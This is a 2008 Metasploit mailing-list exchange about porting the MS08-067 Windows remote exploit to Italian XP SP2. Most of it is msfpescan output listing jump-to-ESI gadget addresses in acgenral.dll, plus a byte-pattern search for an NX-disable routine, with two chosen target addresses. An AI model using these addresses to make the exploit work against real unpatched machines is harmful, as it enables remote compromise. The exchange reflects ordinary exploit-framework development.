MS08-067 added to SVN trunk (3.2-testing)

[giorgio.casali at gmail.com (Giorgio Casali)]

The addressess I've used for a XP SP2 ITA that don't work are:

0x596bf727 ---> Ret
0x596c16e2 --> Disable NX address

It would be great If someone can test them and give a working ones.

Regards

2008/10/28 Rhys Kidd <rhyskidd at gmail.com>:
> Hrmm, ok.
>
> Could you just send the two addresses you finally chose for the JUMP ESI and
> Disable NX address (not the long list this time) to the msf mailing list to
> see if any other Italian locale users can test them, to see if it executes
> cleanly.
>
> Its unreliable at the best of time (regardless of the language/service pack
> porting). I certainly don't get 100% reliability on English.
>
> With more iterations it can only get better.
>
> 2008/10/28 Giorgio Casali <giorgio.casali at gmail.com>
> > giorgio at kozure-okami:~/H4cking/metasploit-trunk$ msfpescan -j esi
> > acgenral.dll
> > [acgenral.dll]
> > 0x596bf727 call esi
> > 0x596c1418 call esi
> > 0x596c145f call esi
> > 0x596c17cb call esi
> > 0x596c17d6 call esi
> > 0x596c2a52 call esi
> > 0x596c2a57 call esi
> > 0x596c2a85 call esi
> > 0x596c2a90 call esi
> > 0x596c2ab4 call esi
> > 0x596c2aba call esi
> > 0x596c2b0a call esi
> > 0x596c2b0f call esi
> > 0x596c33b6 call esi
> > 0x596c3426 call esi
> > 0x596c524e call esi
> > 0x596c5255 call esi
> > 0x596c52ce call esi
> > 0x596c52d5 call esi
> > 0x596c597a call esi
> > 0x596c59a8 call esi
> > 0x596c59f7 call esi
> > 0x596c59fc call esi
> > 0x596c687b call esi
> > 0x596c687e call esi
> > 0x596c6881 call esi
> > 0x596c6922 call esi
> > 0x596c695e call esi
> > 0x596c696e call esi
> > 0x596c7ecb call esi
> > 0x596c7ed5 call esi
> > 0x596c844a call esi
> > 0x596caf60 call esi
> > 0x596cd7db call esi
> > 0x596cd7e3 call esi
> > 0x596cd9be call esi
> > 0x596cd9d6 call esi
> > 0x596cd9e9 call esi
> > 0x596cda01 call esi
> > 0x596cda14 call esi
> > 0x596cda2c call esi
> > 0x596cda43 call esi
> > 0x596cda59 call esi
> > 0x596cda82 call esi
> > 0x596cdb62 call esi
> > 0x596cdb80 call esi
> > 0x596cdb93 call esi
> > 0x596cdbab call esi
> > 0x596cdbc0 call esi
> > 0x596cdd58 call esi
> > 0x596cddc5 call esi
> > 0x596cdf6b call esi
> > 0x596cdf80 call esi
> > 0x596ce00b call esi
> > 0x596ce01b call esi
> > 0x596d1136 call esi
> > 0x596d1153 call esi
> > 0x596d11e1 call esi
> > 0x596d11ff call esi
> > 0x596d3605 call esi
> > 0x596d3618 call esi
> > 0x596d364f call esi
> > 0x596d3662 call esi
> > 0x596d3699 call esi
> > 0x596d36ac call esi
> > 0x596d4d2b call esi
> > 0x596d4d54 call esi
> > 0x596d4d7d call esi
> > 0x596d4da6 call esi
> > 0x596d4dcf call esi
> > 0x596d4df8 call esi
> > 0x596d4e21 call esi
> > 0x596d4e4a call esi
> > 0x596d4e73 call esi
> > 0x596d86e8 call esi
> > 0x596d871f call esi
> > 0x596d8752 call esi
> > 0x596d8775 call esi
> > 0x596db829 push esi; ret
> > 0x596db872 push esi; ret
> > 0x596db8ab push esi; ret
> > 0x596dc78a call esi
> > 0x596dc7e5 call esi
> > 0x596dce32 call esi
> > 0x596dce43 call esi
> > 0x596dce50 call esi
> > 0x596dce66 call esi
> > 0x596dce77 call esi
> > 0x596ddec1 call esi
> > 0x596dded4 call esi
> > 0x596e0fdf call esi
> >
> > I chose the first 0x596bf727 doesn't look like having bad chars.
> >
> >
> > and
> >
> > giorgio at kozure-okami:~/H4cking/metasploit-trunk$ msfpescan -r
> > "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
> > [acgenral.dll]
> > 0x596c16e2 6a048d4508506a226aff
> >
> > Regards